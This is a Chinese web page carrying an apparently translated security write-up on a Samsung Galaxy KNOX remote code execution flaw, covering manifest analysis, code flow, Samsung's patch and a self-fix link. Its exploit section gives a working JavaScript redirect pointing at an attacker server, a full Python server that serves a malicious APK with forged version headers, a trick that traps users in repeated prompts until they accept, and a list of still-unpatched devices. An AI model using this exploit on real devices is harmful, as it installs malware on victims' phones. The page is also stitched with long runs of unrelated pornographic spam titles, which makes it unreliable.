精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

深度:剖析三星Galaxy KNOX遠程代碼執行漏洞

安全 漏洞 終端安全
本文將詳細介紹三星 Galaxy S5最新發現的遠程執行漏洞,攻擊者可以藉此漏洞入侵系統。目前三星官方已在Galaxy S5、Note 4和Alpha產品中修復此漏洞,但在S4,S4 Mini,Note3和Ace 4(可能還有其他設備)上尚未被修復。

本文將詳細介紹三星 Galaxy S5最新發現的遠程執行漏洞,攻擊者可以藉此漏洞入侵系統。目前三星官方已在Galaxy S5、Note 4和Alpha產品中修復此漏洞,但在S4,S4 Mini,Note3和Ace 4(可能還有其他設備)上尚未被修復。

深度:剖析三星Galaxy KNOX遠程代碼執行漏洞

介紹

KNOX,是三星的一款基于開源Android平臺的安全解決方案,可以通過物理手段和軟件體系相結合的方式全面增強了安全性。

我們Quarkslab團隊喜歡搗鼓Android設備。所以當三星Galaxy S5發布時,我們檢查了一下它的固件。很快我們便發現了一個簡單的漏洞和可用的exp(漏洞利用)。出現漏洞的程序是UniversalMDMApplication。這個程序默認包含在S5的ROM中,也是三星KNOX安全解決方案中的一部分。

利用這個漏洞我們可以讓有漏洞的程序誤以為有新的更新。結果就是應用程序會彈出一個窗口詢問用戶是否需要更新。如果用戶選擇“是”,惡意軟件就會安裝;而如果用戶選擇了“否”,我們可以再次彈出窗口讓用戶誤以為“否”這個按鈕失效了。我們的漏洞可以通過email實現(讓用戶點擊一個鏈接),或者也可以在用戶用Chrome/自帶瀏覽器瀏覽網頁時被觸發。或者攻擊者也可以在MITM(中間人攻擊)時在HTML網頁中注入一段JavaScript來實現漏洞。

我們一直沒有公布這個漏洞因為我們打算在mobile pwn2own大賽公布,但貌似今年的規則更嚴了。新的規則中,受害者只能做一次點擊操作。所以當彈窗出現時,盡管大部分用戶會點擊“是”,但對Pwn2Own大賽而言,這已經犯規。

即使沒有“用戶交互”的問題,這個漏洞今年8月也已經在三星Note 4和Alpha上修復,只是直到10月還未在Galaxy S5上修復,所以這漏洞也不能用于pwn2own了。

本文將介紹漏洞工作原理,提醒開發者注意此類漏洞,還將附上漏洞的利用方式。

時間線

2014年4月 - 三星Galaxy S5發布,我們發現了漏洞

2014年8月 - 三星Galaxy Note 4和Alpha發布。在這兩款機型的ROM中漏洞被修復

2014年10月 - 三星S5上的漏洞被修復

2014年11月 - Mobile Pwn2Own大賽

據我們所知,以下機型的漏洞尚未被修復:

三星 Galaxy S4 (ROM版本: I9505XXUGNH8)

三星 Galaxy S4 mini (ROM版本: I9190UBUCNG1)

三星 Galaxy Note 3 (ROM版本: N9005XXUGNG1)

三星 Galaxy Ace 4 (ROM版本: G357FZXXU1ANHD)

警告:這份列表中沒有列出所有設備,其他的設備也可能有漏洞。在文章結尾處有修復漏洞的方法。#p#

漏洞分析

簡短writeup

UniversalMDMClient應用默認是以三星KNOX組件被安裝的,它會注冊一個URI:"smdm://"。當用戶點擊一個指向"smdm://"的鏈接時,UniversalMDMClient中的LaunchActivity組件就會啟動并分析這個URL。它會從這個URL中提取很多信息,包括更新服務器的URL。

提取到更新服務器的URL后,應用會對URL使用HEAD方法,它會檢查服務器是否返回一個非標準的header:"x-amz-meta-apk-version"。如果服務器返回了這個header,它會檢查UniversalMDMClient應用的當前版本,與"x-amz-meta-apk-version" header中的版本進行比對。如果header的版本號更新,它就會向用戶顯示一個彈窗提醒用戶有可用更新,詢問用戶是否需要升級。

深度:剖析三星Galaxy KNOX遠程代碼執行漏洞

如果用戶選擇了“是”,程序就會像更新服務器URL發送GET請求,而響應內容就會以APK文件的形式保存,最后,它會在不提示用戶這個應用程序需要的權限也不檢查程序證書的情況下安裝應用。因此,如果攻擊者能夠讓用戶更新,他也就可以在用戶的設備上安裝惡意軟件了。

2014年10月漏洞被修復,程序會檢查下載的APK程序的包名是否與UniversalMDMClient應用中的相同。由于兩個程序有兩個不同證書而包名相同,所以就不能安裝惡意程序了。

詳細writeup

在UniversalMDMClient的AndroidManifest.xml文件中,我們可以看到它定義了URI:

 

  1. manifest android:versionCode="2" android:versionName="1.1.14" package="com.sec.enterprise.knox.cloudmdm.smdms" 
  2.  xmlns:android="http://schemas.android.com/apk/res/android"> 
  3.   <uses-sdk android:minSdkVersion="17" android:targetSdkVersion="19" /> 
  4.   [...]  
  5.   <uses-permission android:name="android.permission.INSTALL_PACKAGES" /> 
  6.   [...]  
  7.   <application android:allowBackup="true" android:name=".core.Core"> 
  8.     <activity android:configChanges="keyboard|keyboardHidden|orientation" android:excludeFromRecents="true" 
  9.      android:label="@string/titlebar" android:name=".ui.LaunchActivity" android:noHistory="true" 
  10.      android:theme="@android:style/Theme.DeviceDefault"> 
  11.       <intent-filter> 
  12.         <data android:scheme="smdm" /> 
  13.         <action android:name="android.intent.action.VIEW" /> 
  14.         <category android:name="android.intent.category.DEFAULT" /> 
  15.         <category android:name="android.intent.category.BROWSABLE" /> 
  16.       </intent-filter> 
  17.     </activity> 
  18.   [...]  
  19.  </application> 
  20. </manifest> 

 

第11至16行中的intent-filter注冊了URI "smdm://" 并將它與com.sec.enterprise.knox.cloudmdm.smdms.ui.LaunchActivity組件關聯起來。當用戶嘗試打開一個"smdm://" URI時,LaunchActivity中的onCreate()方法就會處理這個URL。我們會從這里深入探究代碼。除了程序代碼通過proguard被“混淆”過,用JEB反編譯器對其進行分析沒有任何困難。

以下是反編譯得到onCreate()方法的源代碼:

深度:剖析三星Galaxy KNOX遠程代碼執行漏洞

onCreate()首先做的是(通過getPreETAG()函數)檢查/data/data/com.sec.enterprise.knox.cloudmdm.smdms/shared_prefs/目錄中是否存在文件PreETag.xml。如果文件存在,應用會調用finish()方法結束執行。默認情況下PreETag.xml文件并不存在。

接著,應用程序會獲取Intent來啟動Activity或者更準確地說是其中的鍵值。鍵值的格式必須是"smdm://hostname?變量1=值1&變量2=值2"。變量名能夠從來源中輕松獲取:seg_url, update_url, email, mdm_token, program和quickstart_url。最重要的是quickstart_url。在一個shared_preference文件內寫入所有這些變量后,調用Core.startSelfUpdateCheck(),onCreate()結束。

深度:剖析三星Galaxy KNOX遠程代碼執行漏洞

Core.startSelfUpdateCheck()負責檢查當前是否正在進行更新,如果沒有,則調用UMCSelfUpdateManager.startSelfUpdateCheck():

深度:剖析三星Galaxy KNOX遠程代碼執行漏洞

UMCSelfUpdateManager.startSelfUpdateCheck()函數檢查是否有數據連接,如果有正在等待的更新則將其刪除,并根據umc_cdn字符串的值構造一個URL,umc_cdn字符串是在shared_pref文件"m.xml"中的,構造完成后將其賦上字符串常量"/latest"。umc_cdn的值就是Intent中的鍵值udpdate_url。所以這是個被攻擊者完全控制的值。接下來它會調用UMCSelfUpdateManager.doUpdateCheck(),把之前構造的URL當作第一個參數:

深度:剖析三星Galaxy KNOX遠程代碼執行漏洞

這個函數中,ContentTransferManager被初始化,并向攻擊者控制的URL發送HEAD HTTP請求。請求的不同狀態會由handleRequestResult類和onFailure()、 onProgress()、onStart()、onSucess()等方法處理。

深度:剖析三星Galaxy KNOX遠程代碼執行漏洞

當然,最有趣的方法還是onSucess()了。它會檢查header中的ETag、Content-Length和x-amz-meta-apk-version。header中的x-amz-meta-apk-version值會與當前UniversalMDMApplication APK包的版本進行比較。如果header中的x-amz-meta-apk-version版本號大于當前的APK版本,則判斷為需要更新。

深度:剖析三星Galaxy KNOX遠程代碼執行漏洞

這時候,用戶屏幕會彈出一個窗口,稱應用有更新,詢問用戶是否要安裝。如果他選擇“是”,我們就能繼續攻擊了。

深度:剖析三星Galaxy KNOX遠程代碼執行漏洞

如果用戶選擇“是”,UMCSelfUpdateManager.onSuccess()就會被調用,它會調用onSucess()方法:

深度:剖析三星Galaxy KNOX遠程代碼執行漏洞

而這個onSuccess()會最終調用beginUpdateProcess()開始更新線程:

深度:剖析三星Galaxy KNOX遠程代碼執行漏洞

更新線程會調用執行installApk(),而installApk()又會調用_installApplication() _installApplication()的功能就是禁止包驗證 (防止Google掃描APK)安裝APK之后再重新開啟包驗證:

深度:剖析三星Galaxy KNOX遠程代碼執行漏洞

整個過程到此結束。下載的APK既沒有經過驗證,也沒有向用戶展示請求的權限。因此這個漏洞能夠被攻擊者用來安裝惡意程序。

深度:剖析三星Galaxy KNOX遠程代碼執行漏洞

而當更新安裝完成后,漏洞就不能再被利用了。因為更新成功后,ETag header的值被寫入/data/data/com.sec.enterprise.knox.cloudmdm.smdms/shared_prefs/PreETag.xml,而LaunchActivity的onCreate()方法中首先就會檢查該文在是否存在。#p#

三星的補丁

為了防止漏洞被利用,程序現在會在安裝前檢查包名,包名必須與UniversalMDMApplication中的包名相同。

以下是進行檢查的函數:

深度:剖析三星Galaxy KNOX遠程代碼執行漏洞

打過補丁的系統中的彈窗:

深度:剖析三星Galaxy KNOX遠程代碼執行漏洞

漏洞利用

EXP相當的簡單,你得讓你的受害者點擊你的URI,可以通過郵件或者是用網頁中JavaScript把他們重定向過去:

  1. <script>  
  2.   function trigger(){  
  3.     document.location="smdm://meow?update_url=http://yourserver/";  
  4.   }  
  5.   setTimeout(trigger, 5000);  
  6. </script> 

有趣的是當你用JavaScript觸發exp時,如果用戶選擇“取消”,Android會返回網頁,繼續執行JavaScript代碼。這意味著我們可以在JavaScript中做循環。用戶可能會認為彈窗的取消鍵不好使了,他們可能就會點“是”。

服務器端,你得返回以下header:

x-amz-meta-apk-version : 編一個大一點的數字。比如 1337 ;

ETag : 假APK的md5校驗值;

Content-Length : APK的大小

以下是服務器端的代碼:

 

  1. import hashlib  
  2. from BaseHTTPServer import BaseHTTPRequestHandler  
  3. APK_FILE = "meow.apk" 
  4. APK_DATA = open(APK_FILE,"rb").read()  
  5. APK_SIZE = str(len(APK_DATA))  
  6. APK_HASH = hashlib.md5(APK_DATA).hexdigest()  
  7. class MyHandler(BaseHTTPRequestHandler):  
  8.     def do_GET(self):  
  9.         self.send_response(200)  
  10.         self.send_header("Content-Length", APK_SIZE)  
  11.         self.send_header("ETag", APK_HASH)  
  12.         self.send_header("x-amz-meta-apk-version", "1337")  
  13.         self.end_headers()  
  14.         self.wfile.write(APK_DATA)  
  15.         return  
  16.     def do_HEAD(self):  
  17.         self.send_response(200)  
  18.         self.send_header("Content-Length", APK_SIZE)  
  19.         self.send_header("ETag", APK_HASH)  
  20.         self.send_header("x-amz-meta-apk-version", "1337")  
  21.         self.end_headers()  
  22.         return  
  23. if __name__ == "__main__":  
  24.     from BaseHTTPServer import HTTPServer  
  25.     server = HTTPServer(('0.0.0.0',8080), MyHandler)  
  26.     server.serve_forever() 

 #p#

怎么自己打補丁呢?

如果你的設備還有漏洞,你可以等三星的補丁,也可以自己修復。修復補丁不需要root權限,只需點擊這個鏈接:

smdm://patch/

實際上點擊這個鏈接時,漏洞程序會啟動,但是沒有指定的更新URL,它會使用默認的三星UMC(Universal MDM Client)服務器http://umc-cdn.secb2b.com:80,這個服務器上有最新版本的UniversalMDMClient.apk。

安裝完成后你可能會看到這個界面,按返回或者Home鍵即可。

深度:剖析三星Galaxy KNOX遠程代碼執行漏洞

以下是對未修復和已修復的S5系統的漏洞利用演示視頻:

譯者注:

這個漏洞已經可以在Metasploit上使用:

模塊:exploit/android/browser/samsung_knox_smdm_url

模塊下載:https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/android/browser/samsung_knox_smdm_url.rb

參考信息來源:Quarkslab & GitHub

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2015-06-18 10:49:31

2016-01-31 16:49:42

漏洞Galaxy

2012-01-18 09:17:54

三星Galaxy

2022-03-08 13:20:33

數據泄露黑客

2012-04-04 11:41:31

三星

2012-04-13 13:40:06

三星

2013-06-26 14:32:18

2012-05-04 14:17:31

評測

2021-12-31 10:46:35

Galaxy Stor三星惡意軟件

2011-08-10 09:19:39

蘋果三星Galaxy 10.1

2012-05-01 16:38:40

三星

2014-03-04 17:44:30

2014-02-27 17:12:02

2012-04-08 14:17:15

蘋果

2012-06-28 15:19:49

蘋果平板電腦

2012-05-04 08:47:00

GALAXY SIII三星

2011-06-14 09:30:40

Galaxy Tab Android 3.1三星

2015-06-18 10:19:11

2012-04-13 19:21:11

三星
點贊
收藏

51CTO技術棧公眾號

亚洲欧美日韩国产中文在线| 日韩成人午夜精品| 日韩国产在线播放| 黄色一级二级三级| 老司机在线看片网av| 成人免费高清视频| 国产精品普通话| 精品一区二区三区四| 九一精品国产| 日韩欧美中文字幕一区| 亚洲乱码国产一区三区| 神马午夜伦理不卡 | 免费在线观看日韩av| 丁香花在线电影| 国产精品美女久久久久久久| 国产自产在线视频一区| 国产男女无套免费网站| 可以看av的网站久久看| 久久久久久久久久国产精品| 成人欧美一区二区三区黑人一| 超碰地址久久| 91精品国产综合久久久久久久| 国产精品97在线| 亚洲资源一区| 国产精品久久久久久久久久免费看| 国语精品中文字幕| 精品国产va久久久久久久| 日本欧美大码aⅴ在线播放| 国模视频一区二区| 日本一级二级视频| 久久亚洲专区| 一区国产精品视频| 国产ts在线播放| 久久动漫网址| 欧美mv日韩mv国产网站app| 天天操天天干天天做| 国产成人精品一区二三区在线观看| 亚洲va中文字幕| 精品久久久久久无码中文野结衣| 国产淫片在线观看| 国产精品欧美久久久久一区二区| 欧美一区二区视频在线| 天堂√在线中文官网在线| 国内成+人亚洲+欧美+综合在线| 国产精品色午夜在线观看| 秋霞精品一区二区三区| 国产精品视区| 97超碰色婷婷| 国产欧美一区二区三区在线看蜜臂| 国产精品v亚洲精品v日韩精品| 久久成人人人人精品欧| 成人在线观看高清| 伊人色**天天综合婷婷| 久久亚洲影音av资源网| 国语对白在线播放| 欧美精品福利| 久久久久久久97| 精品91久久久| 午夜综合激情| 国产成人精品亚洲精品| 中文字幕在线日亚洲9| 免费成人你懂的| 成人美女免费网站视频| 国产一区二区三区黄片| 国产成人午夜精品影院观看视频| 97在线电影| 日韩专区第一页| 91婷婷韩国欧美一区二区| 日本欧美精品久久久| 成人18在线| 最新日韩av在线| 亚洲中文字幕无码一区二区三区| 九色91在线| 日韩欧美一区二区三区| 2021国产精品久久精品| 久久免费视频这里只有精品| 亚洲一区欧美在线| 日韩激情一区二区| 成人黄色免费在线观看| 亚洲欧美强伦一区二区| 91麻豆精品在线观看| 日韩精品一区二区三区四区五区| 最新电影电视剧在线观看免费观看| 亚洲日本成人在线观看| av女优在线播放| 韩国成人在线| 欧美一级xxx| 国产国语性生话播放| 日韩在线欧美| 97视频免费在线观看| 中文字幕av影视| 成人性色生活片免费看爆迷你毛片| 精品日韩美女| 黄色动漫在线观看| 欧美日韩激情小视频| 9l视频白拍9色9l视频| 在线综合色站| 在线视频欧美性高潮| 91精品国产闺蜜国产在线闺蜜| 激情综合视频| 成人h视频在线观看播放| 人妻一区二区三区| 国产精品传媒视频| 男人揉女人奶房视频60分| 96sao精品免费视频观看| 精品亚洲国产成av人片传媒| 女人18毛片毛片毛片毛片区二 | 精品国产一区二区三区久久狼5月| 国产精品白浆一区二小说| 日韩1区2区日韩1区2区| 国产一区二区不卡视频| 麻豆视频在线| 欧美性受xxxx| 人妻丰满熟妇av无码久久洗澡| 国产精品久久久久久久| 国产成人小视频在线观看| 欧美一级片免费| 成人欧美一区二区三区在线播放| 日本wwww视频| 盗摄牛牛av影视一区二区| 深夜福利亚洲导航| 99久久久久久久久| 波多野结衣在线一区| 欧美一级爱爱视频| 精品一区二区三区中文字幕| 中文字幕日韩高清| 日本一本在线观看| 91在线免费播放| 久久亚洲国产成人精品无码区| 日韩深夜福利网站| 国产亚洲欧洲高清| 无码人妻精品一区二区| 97精品视频在线观看自产线路二| www.avtt| 一区二区三区免费在线看| 久久色免费在线视频| 一级做a爰片久久毛片16| 国产欧美va欧美不卡在线| 97在线国产视频| 999国产精品一区| 欧美黑人一区二区三区| 不卡的日韩av| 亚洲综合男人的天堂| 手机看片国产精品| 欧美大片专区| 不卡视频一区| 丰满诱人av在线播放| 欧美成人aa大片| 久久精品无码人妻| 成人成人成人在线视频| 成 年 人 黄 色 大 片大 全| 极品尤物一区| 69av在线视频| 麻豆av电影在线观看| 色88888久久久久久影院野外 | 老司机午夜福利视频| 亚洲女女做受ⅹxx高潮| 992tv人人草| 欧美日韩国产成人精品| 国产一区二区精品在线| 精精国产xxxx视频在线播放| 精品亚洲夜色av98在线观看| 日本视频免费观看| 国产精品人妖ts系列视频| 日韩成人精品视频在线观看| 在线播放/欧美激情| 欧美亚洲在线日韩| 国产精品美乳一区二区免费| 天堂中文а√在线| 欧美一卡2卡3卡4卡| 国产精品 欧美 日韩| 97久久超碰国产精品| 国产精品乱码久久久久| 欧美激情国产在线| 97视频中文字幕| 国产中文在线播放| 亚洲系列中文字幕| 国产乱叫456在线| 亚洲国产成人tv| 90岁老太婆乱淫| 精品一区二区三区久久久| www.激情网| 国产一区2区| 成人看片人aa| 高清毛片在线观看| 中文字幕在线国产精品| 成人精品在线播放| 在线免费不卡电影| 九九视频免费在线观看| 久久老女人爱爱| 五月六月丁香婷婷| 欧美亚洲在线| 大片在线观看网站免费收看| 伊人春色精品| 97在线中文字幕| 国产超碰精品| 欧美国产精品日韩| 国内精品一区视频| 欧美成人vps| 一级特黄特色的免费大片视频| 午夜精品福利视频网站| 中文字幕资源站| 91色|porny| 91性高潮久久久久久久| 老司机精品久久| 成人免费在线网| 一本精品一区二区三区| 热舞福利精品大尺度视频| 91精品国产自产精品男人的天堂| 国产91热爆ts人妖在线| 欧美xxxx做受欧美88bbw| 中文字幕日韩av综合精品| 亚洲人视频在线观看| 欧美一区二区三级| 在线视频免费观看一区| 黑人巨大精品欧美一区二区免费 | 日韩免费av在线| 欧洲一区二区三区| www国产精品视频| 国模吧精品人体gogo| 国产婷婷色综合av蜜臀av | 亚洲毛片在线免费观看| 狠狠综合久久av一区二区| 7777精品伊人久久久大香线蕉经典版下载 | 午夜精品123| 国产香蕉在线视频| 亚洲免费在线播放| 国产精品国产三级国产传播| 欧美国产日本视频| 成人片黄网站色大片免费毛片| 成人97人人超碰人人99| 男人添女人荫蒂国产| 国产一区二区久久| 婷婷激情5月天| 久久精品免费观看| jizz18女人| 麻豆精品一二三| 奇米影音第四色| 日韩电影免费在线看| 五月天亚洲视频| 日韩经典一区二区| 艹b视频在线观看| 毛片一区二区三区| 日韩在线一区视频| 久久成人av少妇免费| 潘金莲激情呻吟欲求不满视频| 日本免费新一区视频| 天天操天天爱天天爽| 美女视频黄频大全不卡视频在线播放| 国产真人无码作爱视频免费| 视频一区二区国产| 五月婷婷狠狠操| 久久福利资源站| 一级黄色高清视频| 国产电影一区二区三区| 免费啪视频在线观看| www.欧美色图| 国产精品高清无码在线观看| 久久精品在这里| 夫妇露脸对白88av| 自拍偷在线精品自拍偷无码专区| 色老板免费视频| 一区二区免费看| 五月天婷婷综合网| 色8久久人人97超碰香蕉987| 特级西西444www高清大视频| 欧美男人的天堂一二区| 精品人妻一区二区三区麻豆91| 欧美xxx久久| 视频一区二区三区国产| 中文字幕精品网| 调教一区二区| 欧美亚洲日本网站| 国产精品伊人| 高清免费日韩| 国产中文字幕一区二区三区| 懂色av粉嫩av蜜臀av| 99国产精品视频免费观看一公开| 成人午夜视频免费在线观看| 麻豆一区二区三| 国产欧美视频一区| 国产女人aaa级久久久级 | 成人福利视频网| caoporn成人| 神马影院午夜我不卡| 亚洲欧美综合久久久| 黄色一级视频片| 精品一区二区三区影院在线午夜| 亚洲高清无码久久| 国产精品久久久久一区| 国产精品a成v人在线播放| 欧美视频一区在线观看| 成人av免费播放| 一本色道久久88亚洲综合88| 久草在线视频资源| 国产精品一区久久久| 久久夜色电影| 三年中文高清在线观看第6集| 亚洲激情网站| 老司机午夜性大片| 久久综合色综合88| 久久久久久久极品内射| 欧美撒尿777hd撒尿| 亚洲欧美色视频| 欧美成人激情视频| 日本成人片在线| 国产在线欧美日韩| 亚洲老妇激情| 亚洲欧美国产中文| ww亚洲ww在线观看国产| 久久久精品99| 欧美久久高跟鞋激| 邻居大乳一区二区三区| 久久久久久久色| 91麻豆精品| 亚洲国产精品综合| 六月婷婷一区| 亚洲精品乱码久久| 一区二区三区视频在线看| 中文字幕资源网| 亚洲色在线视频| 亚洲涩涩在线| 精品亚洲欧美日韩| 99热免费精品在线观看| 麻豆tv在线观看| 亚洲精品视频在线观看免费| 这里只有精品免费视频| 亚洲精品日韩欧美| 国产拍在线视频| 国产精品嫩草在线观看| 欧美久久一级| 免费观看黄网站| 亚洲精品视频在线| 国产丰满果冻videossex| 日韩视频第一页| 亚洲伊人精品酒店| 一区二区三区在线视频111| 麻豆成人在线观看| 成人信息集中地| 欧美日韩卡一卡二| 在线中文资源天堂| 国产精品免费视频久久久| 青草国产精品| 一本色道久久亚洲综合精品蜜桃 | 亚洲日本无吗高清不卡| 久久精品久久99精品久久| 国产精品理论在线| 欧美久久一二区| 国产色在线观看| 亚洲综合精品伊人久久| 精品69视频一区二区三区Q| 任你躁av一区二区三区| 五月天欧美精品| 四虎在线免费观看| 国产成人精品优优av| 久久伦理在线| 国产成人强伦免费视频网站| 一区二区不卡在线视频 午夜欧美不卡在 | 欧美一区二区三区日韩| √天堂8在线网| 粉嫩av免费一区二区三区| 最新亚洲一区| 亚洲a v网站| 7777精品伊人久久久大香线蕉| av网站在线免费| 国产欧美日韩伦理| 亚洲欧美成人综合| 91麻豆制片厂| 日韩视频永久免费| 美女18一级毛片一品久道久久综合| 欧美精品久久久| 精品一区二区三区久久久| 久草视频免费在线| 国产视频精品久久久| 国产精品无码久久久久| 韩日视频在线观看| 久久久精品综合| 国产精品久久免费| 97国产精品免费视频| 国产午夜一区| 香蕉视频免费网站| 日本精品免费观看高清观看| 国产网友自拍视频导航网站在线观看| 亚洲综合日韩在线| 久久一区二区三区超碰国产精品| 人人澡人人澡人人看| 亚洲国产精品成人精品| 91精品店在线| 毛片在线播放视频| 国产精品你懂的| 六月婷婷综合网| 国产欧美精品一区二区三区介绍| 亚洲夜间福利| 9.1片黄在线观看| 亚洲国产成人爱av在线播放| 欧美一级免费| 哪个网站能看毛片| 亚洲精品美腿丝袜| 91精品大全| 久久亚洲综合网|